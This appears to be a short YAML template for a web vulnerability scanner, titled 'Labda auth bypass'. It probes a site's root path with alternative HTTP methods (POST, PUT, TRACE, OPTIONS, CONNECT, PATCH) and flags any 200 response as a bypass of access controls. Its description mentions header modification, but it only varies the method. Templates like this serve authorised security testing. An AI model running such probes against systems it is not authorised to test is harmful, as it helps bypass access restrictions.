id: Labda_auth_Bypass_method

info:
  name: Labda auth bypass
  author: Labda
  description: Bypasses authorization with header modification
  tags: bypass, web, authorization, Forbidden

requests:
  - raw:
      - |+
        {{method}} / HTTP/1.1
        Host: {{BaseURL}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
    payloads:
      method:
        - POST
        - PUT
        - TRACE
        - OPTIONS
        - CONNECT
        - PATCH
    attack: batteringram
    unsafe: true
    matchers:
        - type: status
          status:
            - 200
